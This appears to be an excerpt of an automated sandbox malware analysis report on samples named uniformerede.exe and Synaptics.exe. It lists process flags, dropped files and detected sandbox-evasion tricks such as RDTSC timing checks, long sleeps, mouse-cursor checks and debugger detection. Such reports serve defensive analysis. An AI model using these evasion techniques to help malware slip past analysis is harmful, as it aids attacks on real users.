Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00435BD4	6_2_00435BD4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00435BD4	9_2_00435BD4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00435BD4	12_2_00435BD4

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424	Thread sleep count: 5521 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6412	Thread sleep count: 695 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6520	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6468	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7164	Thread sleep time: -840000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6832	Thread sleep count: 1488 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6868	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5521	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 695	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1488	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	API coverage: 7.5 %
Source: C:\ProgramData\Synaptics\Synaptics.exe	API coverage: 5.8 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00435BD4		12_2_00435BD4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00435BD4		6_2_00435BD4

Found dropped PE file which has not been started or loaded

Source: C:\ProgramData\Synaptics\Synaptics.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXF979.tmp	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp	Jump to dropped file

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		6_2_00458EA4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		12_2_00458EA4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\._cache_uniformerede.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00426548 GetSystemInfo,

6_2_00426548

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	6_2_004099E0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	6_2_00406018
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00409B1C FindFirstFileA,GetLastError,	6_2_00409B1C
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_00405D74
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_0040290B FindFirstFileW,	7_2_0040290B
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_0040699E FindFirstFileW,FindClose,	7_2_0040699E
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	9_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00409B1C FindFirstFileA,GetLastError,	9_2_00409B1C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	9_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	12_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	12_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00409B1C FindFirstFileA,GetLastError,	12_2_00409B1C

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,

6_2_004730FC

Checks if the current process is being debugged

Source: C:\ProgramData\Synaptics\Synaptics.exe

Process queried: DebugPort

Jump to behavior

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\ProgramData\Synaptics\Synaptics.exe

Code function: 9_2_00422BCC VirtualAlloc,LdrInitializeThunk,LdrInitializeThunk,

9_2_00422BCC

